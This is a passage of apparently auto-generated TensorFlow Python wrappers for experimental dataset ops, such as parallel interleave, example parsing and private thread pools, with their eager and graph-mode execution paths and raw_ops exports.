        batch_size, num_parallel_calls, drop_remainder, "f", f,
        "output_types", output_types, "output_shapes", output_shapes,
        "preserve_cardinality", preserve_cardinality)
      return _result
    except _core._FallbackException:
      # Fast path rejected the inputs; retry via the slow eager path.
      try:
        return experimental_numa_map_and_batch_dataset_eager_fallback(
            input_dataset, other_arguments, batch_size, num_parallel_calls,
            drop_remainder, f=f, output_types=output_types,
            output_shapes=output_shapes,
            preserve_cardinality=preserve_cardinality, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise the op error as the corresponding Python exception,
      # appending the op name for easier debugging.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Graph mode: validate attrs, then add nodes to the TensorFlow graph.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_numa_map_and_batch_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_numa_map_and_batch_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  if preserve_cardinality is None:
    preserve_cardinality = False
  preserve_cardinality = _execute.make_bool(preserve_cardinality, "preserve_cardinality")
  _, _, _op = _op_def_lib._apply_op_helper(
      "ExperimentalNumaMapAndBatchDataset", input_dataset=input_dataset,
                                            other_arguments=other_arguments,
                                            batch_size=batch_size,
                                            num_parallel_calls=num_parallel_calls,
                                            drop_remainder=drop_remainder,
                                            f=f, output_types=output_types,
                                            output_shapes=output_shapes,
                                            preserve_cardinality=preserve_cardinality,
                                            name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("f", _op.get_attr("f"), "Targuments", _op.get_attr("Targuments"),
            "output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"), "preserve_cardinality",
            _op.get_attr("preserve_cardinality"))
  _execute.record_gradient(
      "ExperimentalNumaMapAndBatchDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalNumaMapAndBatchDataset(input_dataset, other_arguments, batch_size, num_parallel_calls, drop_remainder, f, output_types, output_shapes, preserve_cardinality=False, name=None):
  # Thin pass-through wrapper for the tf.raw_ops export below.
  return experimental_numa_map_and_batch_dataset(input_dataset=input_dataset, other_arguments=other_arguments, batch_size=batch_size, num_parallel_calls=num_parallel_calls, drop_remainder=drop_remainder, f=f, output_types=output_types, output_shapes=output_shapes, preserve_cardinality=preserve_cardinality, name=name)
ExperimentalNumaMapAndBatchDataset.__doc__ = experimental_numa_map_and_batch_dataset.__doc__
# Hide from generated API docs, force keyword-only calls, then export as a raw op.
ExperimentalNumaMapAndBatchDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalNumaMapAndBatchDataset))
tf_export("raw_ops.ExperimentalNumaMapAndBatchDataset")(ExperimentalNumaMapAndBatchDataset)
def experimental_numa_map_and_batch_dataset_eager_fallback(input_dataset, other_arguments, batch_size, num_parallel_calls, drop_remainder, f, output_types, output_shapes, preserve_cardinality=False, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.
  This is for function experimental_numa_map_and_batch_dataset
  """
  # Use the caller-supplied context when given; otherwise the default one.
  _ctx = ctx or _context.context()
  # Canonicalize the list-valued attributes, rejecting non-sequences.
  if isinstance(output_types, (list, tuple)):
    output_types = [_execute.make_type(_dt, "output_types") for _dt in output_types]
  else:
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_numa_map_and_batch_dataset' Op, not %r." % output_types)
  if isinstance(output_shapes, (list, tuple)):
    output_shapes = [_execute.make_shape(_sh, "output_shapes") for _sh in output_shapes]
  else:
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_numa_map_and_batch_dataset' Op, not %r." % output_shapes)
  preserve_cardinality = _execute.make_bool(
      False if preserve_cardinality is None else preserve_cardinality,
      "preserve_cardinality")
  # Convert every input to an eager tensor of the dtype the op expects.
  _attr_Targuments, other_arguments = _execute.convert_to_mixed_eager_tensors(other_arguments, _ctx)
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  batch_size = _ops.convert_to_tensor(batch_size, _dtypes.int64)
  num_parallel_calls = _ops.convert_to_tensor(num_parallel_calls, _dtypes.int64)
  drop_remainder = _ops.convert_to_tensor(drop_remainder, _dtypes.bool)
  _inputs_flat = [input_dataset] + list(other_arguments)
  _inputs_flat += [batch_size, num_parallel_calls, drop_remainder]
  _attrs = ("f", f, "Targuments", _attr_Targuments, "output_types",
            output_types, "output_shapes", output_shapes,
            "preserve_cardinality", preserve_cardinality)
  _result = _execute.execute(b"ExperimentalNumaMapAndBatchDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalNumaMapAndBatchDataset", _inputs_flat, _attrs, _result,
      name)
  (_out,) = _result
  return _out
def experimental_parallel_interleave_dataset(input_dataset, other_arguments, cycle_length, block_length, sloppy, buffer_output_elements, prefetch_input_elements, f, output_types, output_shapes, name=None):
  r"""Creates a dataset that applies `f` to the outputs of `input_dataset`.

  The resulting dataset is similar to the `InterleaveDataset`, with the exception
  that if retrieving the next value from a dataset would cause the requester to
  block, it will skip that input dataset. This dataset is especially useful
  when loading data from a variable-latency datastores (e.g. HDFS, GCS), as it
  allows the training step to proceed so long as some data is available.

  !! WARNING !! This dataset is not deterministic!

  Args:
    input_dataset: A `Tensor` of type `variant`.
    other_arguments: A list of `Tensor` objects.
    cycle_length: A `Tensor` of type `int64`.
    block_length: A `Tensor` of type `int64`.
    sloppy: A `Tensor` of type `bool`.
    buffer_output_elements: A `Tensor` of type `int64`.
    prefetch_input_elements: A `Tensor` of type `int64`.
    f: A function decorated with @Defun.
      A function mapping elements of `input_dataset`, concatenated with
      `other_arguments`, to a Dataset variant that contains elements matching
      `output_types` and `output_shapes`.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager fast path: dispatch directly through the C API.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalParallelInterleaveDataset", name,
        _ctx._post_execution_callbacks, input_dataset, other_arguments,
        cycle_length, block_length, sloppy, buffer_output_elements,
        prefetch_input_elements, "f", f, "output_types", output_types,
        "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      # Fast path rejected the inputs; retry via the slow eager path.
      try:
        return experimental_parallel_interleave_dataset_eager_fallback(
            input_dataset, other_arguments, cycle_length, block_length,
            sloppy, buffer_output_elements, prefetch_input_elements, f=f,
            output_types=output_types, output_shapes=output_shapes, name=name,
            ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise the op error as the corresponding Python exception,
      # appending the op name for easier debugging.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Graph mode: validate attrs, then add nodes to the TensorFlow graph.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_parallel_interleave_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_parallel_interleave_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
      "ExperimentalParallelInterleaveDataset", input_dataset=input_dataset,
                                               other_arguments=other_arguments,
                                               cycle_length=cycle_length,
                                               block_length=block_length,
                                               sloppy=sloppy,
                                               buffer_output_elements=buffer_output_elements,
                                               prefetch_input_elements=prefetch_input_elements,
                                               f=f,
                                               output_types=output_types,
                                               output_shapes=output_shapes,
                                               name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("f", _op.get_attr("f"), "Targuments", _op.get_attr("Targuments"),
            "output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalParallelInterleaveDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalParallelInterleaveDataset(input_dataset, other_arguments, cycle_length, block_length, sloppy, buffer_output_elements, prefetch_input_elements, f, output_types, output_shapes, name=None):
  # Thin pass-through wrapper for the tf.raw_ops export below.
  return experimental_parallel_interleave_dataset(input_dataset=input_dataset, other_arguments=other_arguments, cycle_length=cycle_length, block_length=block_length, sloppy=sloppy, buffer_output_elements=buffer_output_elements, prefetch_input_elements=prefetch_input_elements, f=f, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalParallelInterleaveDataset.__doc__ = experimental_parallel_interleave_dataset.__doc__
# Hide from generated API docs, force keyword-only calls, then export as a raw op.
ExperimentalParallelInterleaveDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalParallelInterleaveDataset))
tf_export("raw_ops.ExperimentalParallelInterleaveDataset")(ExperimentalParallelInterleaveDataset)
def experimental_parallel_interleave_dataset_eager_fallback(input_dataset, other_arguments, cycle_length, block_length, sloppy, buffer_output_elements, prefetch_input_elements, f, output_types, output_shapes, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.
  This is for function experimental_parallel_interleave_dataset
  """
  # Use the caller-supplied context when given; otherwise the default one.
  _ctx = ctx or _context.context()
  # Canonicalize the list-valued attributes, rejecting non-sequences.
  if isinstance(output_types, (list, tuple)):
    output_types = [_execute.make_type(_dt, "output_types") for _dt in output_types]
  else:
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_parallel_interleave_dataset' Op, not %r." % output_types)
  if isinstance(output_shapes, (list, tuple)):
    output_shapes = [_execute.make_shape(_sh, "output_shapes") for _sh in output_shapes]
  else:
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_parallel_interleave_dataset' Op, not %r." % output_shapes)
  # Convert every input to an eager tensor of the dtype the op expects.
  _attr_Targuments, other_arguments = _execute.convert_to_mixed_eager_tensors(other_arguments, _ctx)
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  cycle_length = _ops.convert_to_tensor(cycle_length, _dtypes.int64)
  block_length = _ops.convert_to_tensor(block_length, _dtypes.int64)
  sloppy = _ops.convert_to_tensor(sloppy, _dtypes.bool)
  buffer_output_elements = _ops.convert_to_tensor(buffer_output_elements, _dtypes.int64)
  prefetch_input_elements = _ops.convert_to_tensor(prefetch_input_elements, _dtypes.int64)
  _inputs_flat = [input_dataset] + list(other_arguments)
  _inputs_flat += [cycle_length, block_length, sloppy,
                   buffer_output_elements, prefetch_input_elements]
  _attrs = ("f", f, "Targuments", _attr_Targuments, "output_types",
            output_types, "output_shapes", output_shapes)
  _result = _execute.execute(b"ExperimentalParallelInterleaveDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalParallelInterleaveDataset", _inputs_flat, _attrs, _result,
      name)
  (_out,) = _result
  return _out
def experimental_parse_example_dataset(input_dataset, num_parallel_calls, dense_defaults, sparse_keys, dense_keys, sparse_types, dense_shapes, output_types, output_shapes, sloppy=False, name=None):
  r"""Transforms `input_dataset` containing `Example` protos as vectors of DT_STRING into a dataset of `Tensor` or `SparseTensor` objects representing the parsed features.

  Args:
    input_dataset: A `Tensor` of type `variant`.
    num_parallel_calls: A `Tensor` of type `int64`.
    dense_defaults: A list of `Tensor` objects with types from: `float32`, `int64`, `string`.
      A dict mapping string keys to `Tensor`s.
      The keys of the dict must match the dense_keys of the feature.
    sparse_keys: A list of `strings`.
      A list of string keys in the examples features.
      The results for these keys will be returned as `SparseTensor` objects.
    dense_keys: A list of `strings`.
      A list of Ndense string Tensors (scalars).
      The keys expected in the Examples features associated with dense values.
    sparse_types: A list of `tf.DTypes` from: `tf.float32, tf.int64, tf.string`.
      A list of `DTypes` of the same length as `sparse_keys`.
      Only `tf.float32` (`FloatList`), `tf.int64` (`Int64List`),
      and `tf.string` (`BytesList`) are supported.
    dense_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`).
      List of tuples with the same length as `dense_keys`.
      The shape of the data for each dense feature referenced by `dense_keys`.
      Required for any input tensors identified by `dense_keys`. Must be
      either fully defined, or may contain an unknown first dimension.
      An unknown first dimension means the feature is treated as having
      a variable number of blocks, and the output shape along this dimension
      is considered unknown at graph build time. Padding is applied for
      minibatch elements smaller than the maximum number of blocks for the
      given feature along this dimension.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
      The type list for the return values.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
      The list of shapes being produced.
    sloppy: An optional `bool`. Defaults to `False`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager fast path: dispatch directly through the C API.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalParseExampleDataset", name,
        _ctx._post_execution_callbacks, input_dataset, num_parallel_calls,
        dense_defaults, "sparse_keys", sparse_keys, "dense_keys", dense_keys,
        "sparse_types", sparse_types, "dense_shapes", dense_shapes,
        "output_types", output_types, "output_shapes", output_shapes,
        "sloppy", sloppy)
      return _result
    except _core._FallbackException:
      # Fast path rejected the inputs; retry via the slow eager path.
      try:
        return experimental_parse_example_dataset_eager_fallback(
            input_dataset, num_parallel_calls, dense_defaults,
            sparse_keys=sparse_keys, dense_keys=dense_keys,
            sparse_types=sparse_types, dense_shapes=dense_shapes,
            output_types=output_types, output_shapes=output_shapes,
            sloppy=sloppy, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise the op error as the corresponding Python exception,
      # appending the op name for easier debugging.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Graph mode: validate attrs, then add nodes to the TensorFlow graph.
  if not isinstance(sparse_keys, (list, tuple)):
    raise TypeError(
        "Expected list for 'sparse_keys' argument to "
        "'experimental_parse_example_dataset' Op, not %r." % sparse_keys)
  sparse_keys = [_execute.make_str(_s, "sparse_keys") for _s in sparse_keys]
  if not isinstance(dense_keys, (list, tuple)):
    raise TypeError(
        "Expected list for 'dense_keys' argument to "
        "'experimental_parse_example_dataset' Op, not %r." % dense_keys)
  dense_keys = [_execute.make_str(_s, "dense_keys") for _s in dense_keys]
  if not isinstance(sparse_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'sparse_types' argument to "
        "'experimental_parse_example_dataset' Op, not %r." % sparse_types)
  sparse_types = [_execute.make_type(_t, "sparse_types") for _t in sparse_types]
  if not isinstance(dense_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'dense_shapes' argument to "
        "'experimental_parse_example_dataset' Op, not %r." % dense_shapes)
  dense_shapes = [_execute.make_shape(_s, "dense_shapes") for _s in dense_shapes]
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_parse_example_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_parse_example_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  if sloppy is None:
    sloppy = False
  sloppy = _execute.make_bool(sloppy, "sloppy")
  _, _, _op = _op_def_lib._apply_op_helper(
      "ExperimentalParseExampleDataset", input_dataset=input_dataset,
                                         num_parallel_calls=num_parallel_calls,
                                         dense_defaults=dense_defaults,
                                         sparse_keys=sparse_keys,
                                         dense_keys=dense_keys,
                                         sparse_types=sparse_types,
                                         dense_shapes=dense_shapes,
                                         output_types=output_types,
                                         output_shapes=output_shapes,
                                         sloppy=sloppy, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("sparse_keys", _op.get_attr("sparse_keys"), "dense_keys",
            _op.get_attr("dense_keys"), "sparse_types",
            _op.get_attr("sparse_types"), "Tdense", _op.get_attr("Tdense"),
            "dense_shapes", _op.get_attr("dense_shapes"), "output_types",
            _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"), "sloppy", _op.get_attr("sloppy"))
  _execute.record_gradient(
      "ExperimentalParseExampleDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalParseExampleDataset(input_dataset, num_parallel_calls, dense_defaults, sparse_keys, dense_keys, sparse_types, dense_shapes, output_types, output_shapes, sloppy=False, name=None):
  # Thin pass-through wrapper for the tf.raw_ops export below.
  return experimental_parse_example_dataset(input_dataset=input_dataset, num_parallel_calls=num_parallel_calls, dense_defaults=dense_defaults, sparse_keys=sparse_keys, dense_keys=dense_keys, sparse_types=sparse_types, dense_shapes=dense_shapes, output_types=output_types, output_shapes=output_shapes, sloppy=sloppy, name=name)
ExperimentalParseExampleDataset.__doc__ = experimental_parse_example_dataset.__doc__
# Hide from generated API docs, force keyword-only calls, then export as a raw op.
ExperimentalParseExampleDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalParseExampleDataset))
tf_export("raw_ops.ExperimentalParseExampleDataset")(ExperimentalParseExampleDataset)
def experimental_parse_example_dataset_eager_fallback(input_dataset, num_parallel_calls, dense_defaults, sparse_keys, dense_keys, sparse_types, dense_shapes, output_types, output_shapes, sloppy=False, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.
  This is for function experimental_parse_example_dataset
  """
  # Use the caller-supplied context when given; otherwise the default one.
  _ctx = ctx or _context.context()
  # Canonicalize the list-valued attributes, rejecting non-sequences.
  if isinstance(sparse_keys, (list, tuple)):
    sparse_keys = [_execute.make_str(_k, "sparse_keys") for _k in sparse_keys]
  else:
    raise TypeError(
        "Expected list for 'sparse_keys' argument to "
        "'experimental_parse_example_dataset' Op, not %r." % sparse_keys)
  if isinstance(dense_keys, (list, tuple)):
    dense_keys = [_execute.make_str(_k, "dense_keys") for _k in dense_keys]
  else:
    raise TypeError(
        "Expected list for 'dense_keys' argument to "
        "'experimental_parse_example_dataset' Op, not %r." % dense_keys)
  if isinstance(sparse_types, (list, tuple)):
    sparse_types = [_execute.make_type(_dt, "sparse_types") for _dt in sparse_types]
  else:
    raise TypeError(
        "Expected list for 'sparse_types' argument to "
        "'experimental_parse_example_dataset' Op, not %r." % sparse_types)
  if isinstance(dense_shapes, (list, tuple)):
    dense_shapes = [_execute.make_shape(_sh, "dense_shapes") for _sh in dense_shapes]
  else:
    raise TypeError(
        "Expected list for 'dense_shapes' argument to "
        "'experimental_parse_example_dataset' Op, not %r." % dense_shapes)
  if isinstance(output_types, (list, tuple)):
    output_types = [_execute.make_type(_dt, "output_types") for _dt in output_types]
  else:
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_parse_example_dataset' Op, not %r." % output_types)
  if isinstance(output_shapes, (list, tuple)):
    output_shapes = [_execute.make_shape(_sh, "output_shapes") for _sh in output_shapes]
  else:
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_parse_example_dataset' Op, not %r." % output_shapes)
  sloppy = _execute.make_bool(False if sloppy is None else sloppy, "sloppy")
  # Convert every input to an eager tensor of the dtype the op expects.
  _attr_Tdense, dense_defaults = _execute.convert_to_mixed_eager_tensors(dense_defaults, _ctx)
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  num_parallel_calls = _ops.convert_to_tensor(num_parallel_calls, _dtypes.int64)
  _inputs_flat = [input_dataset, num_parallel_calls] + list(dense_defaults)
  _attrs = ("sparse_keys", sparse_keys, "dense_keys", dense_keys,
            "sparse_types", sparse_types, "Tdense", _attr_Tdense,
            "dense_shapes", dense_shapes, "output_types", output_types,
            "output_shapes", output_shapes, "sloppy", sloppy)
  _result = _execute.execute(b"ExperimentalParseExampleDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalParseExampleDataset", _inputs_flat, _attrs, _result, name)
  (_out,) = _result
  return _out
def experimental_private_thread_pool_dataset(input_dataset, num_threads, output_types, output_shapes, name=None):
  r"""Creates a dataset that uses a custom thread pool to compute `input_dataset`.

  Args:
    input_dataset: A `Tensor` of type `variant`.
    num_threads: A `Tensor` of type `int64`.
      Identifies the number of threads to use for the private threadpool.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager fast path: dispatch directly through the C API.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalPrivateThreadPoolDataset", name,
        _ctx._post_execution_callbacks, input_dataset, num_threads,
        "output_types", output_types, "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      # Fast path rejected the inputs; retry via the slow eager path.
      try:
        return experimental_private_thread_pool_dataset_eager_fallback(
            input_dataset, num_threads, output_types=output_types,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise the op error as the corresponding Python exception,
      # appending the op name for easier debugging.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Graph mode: validate attrs, then add nodes to the TensorFlow graph.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_private_thread_pool_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_private_thread_pool_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
      "ExperimentalPrivateThreadPoolDataset", input_dataset=input_dataset,
                                              num_threads=num_threads,
                                              output_types=output_types,
                                              output_shapes=output_shapes,
                                              name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalPrivateThreadPoolDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalPrivateThreadPoolDataset(input_dataset, num_threads, output_types, output_shapes, name=None):
  # Thin pass-through wrapper for the tf.raw_ops export below.
  return experimental_private_thread_pool_dataset(input_dataset=input_dataset, num_threads=num_threads, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalPrivateThreadPoolDataset.__doc__ = experimental_private_thread_pool_dataset.__doc__
# Hide from generated API docs, force keyword-only calls, then export as a raw op.
ExperimentalPrivateThreadPoolDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalPrivateThreadPoolDataset))
tf_export("raw_ops.ExperimentalPrivateThreadPoolDataset")(ExperimentalPrivateThreadPoolDataset)
def experimental_private_thread_pool_dataset_eager_fallback(input_dataset, num_threads, output_types, output_shapes, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.
  This is for function experimental_private_thread_pool_dataset
  """
  # Use the caller-supplied context when given; otherwise the default one.
  _ctx = ctx or _context.context()
  # Canonicalize the list-valued attributes, rejecting non-sequences.
  if isinstance(output_types, (list, tuple)):
    output_types = [_execute.make_type(_dt, "output_types") for _dt in output_types]
  else:
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_private_thread_pool_dataset' Op, not %r." % output_types)
  if isinstance(output_shapes, (list, tuple)):
    output_shapes = [_execute.make_shape(_sh, "output_shapes") for _sh in output_shapes]
  else:
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_private_thread_pool_dataset' Op, not %r." % output_shapes)
  # Convert the inputs to the dtypes the op expects, then execute.
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  num_threads = _ops.convert_to_tensor(num_threads, _dtypes.int64)
  _inputs_flat = [input_dataset, num_threads]
  _attrs = ("output_types", output_types, "output_shapes", output_shapes)
  _result = _execute.execute(b"ExperimentalPrivateThreadPoolDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalPrivateThreadPoolDataset", _inputs_flat, _attrs, _result,
      name)
  (_out,) = _result
  return _out
def experimental_random_dataset(seed, seed2, output_types, output_shapes, name=None):
  r"""Creates a Dataset that returns pseudorandom numbers.

  Args:
    seed: A `Tensor` of type `int64`.
      A scalar seed for the random number generator. If either seed or
      seed2 is set to be non-zero, the random number generator is seeded
      by the given seed. Otherwise, a random seed is used.
    seed2: A `Tensor` of type `int64`.
      A second scalar seed to avoid seed collision.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager fast path: dispatch directly through the C API.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalRandomDataset", name, _ctx._post_execution_callbacks,
        seed, seed2, "output_types", output_types, "output_shapes",
        output_shapes)
      return _result
    except _core._FallbackException:
      # Fast path rejected the inputs; retry via the slow eager path.
      try:
        return experimental_random_dataset_eager_fallback(
            seed, seed2, output_types=output_types,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise the op error as the corresponding Python exception,
      # appending the op name for easier debugging.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Graph mode: validate attrs, then add nodes to the TensorFlow graph.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_random_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_random_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
      "ExperimentalRandomDataset", seed=seed, seed2=seed2,
                                   output_types=output_types,
                                   output_shapes=output_shapes, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalRandomDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalRandomDataset(seed, seed2, output_types, output_shapes, name=None):
  # Raw-op alias: forwards straight to the snake_case implementation.
  return experimental_random_dataset(seed, seed2, output_types,
                                     output_shapes, name)
ExperimentalRandomDataset.__doc__ = experimental_random_dataset.__doc__
ExperimentalRandomDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalRandomDataset))
tf_export("raw_ops.ExperimentalRandomDataset")(ExperimentalRandomDataset)
def experimental_random_dataset_eager_fallback(seed, seed2, output_types, output_shapes, name=None, ctx=None):
  r"""Slow-path eager-mode executor for experimental_random_dataset.

  Validates the attribute lists, converts both seeds to int64 tensors and
  runs the ExperimentalRandomDataset op through _execute.execute.
  """
  exec_ctx = ctx if ctx else _context.context()
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_random_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(dt, "output_types") for dt in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_random_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(sh, "output_shapes")
                   for sh in output_shapes]
  flat_inputs = [
      _ops.convert_to_tensor(seed, _dtypes.int64),
      _ops.convert_to_tensor(seed2, _dtypes.int64),
  ]
  op_attrs = ("output_types", output_types, "output_shapes", output_shapes)
  results = _execute.execute(
      b"ExperimentalRandomDataset", 1, inputs=flat_inputs, attrs=op_attrs,
      ctx=exec_ctx, name=name)
  _execute.record_gradient(
      "ExperimentalRandomDataset", flat_inputs, op_attrs, results, name)
  dataset_variant, = results
  return dataset_variant
def experimental_rebatch_dataset(input_dataset, num_workers, output_types, output_shapes, name=None):
  r"""Creates a dataset that changes the batch size.

  Creates a dataset that changes the batch size of the dataset to current batch
  size // num_workers.

  Args:
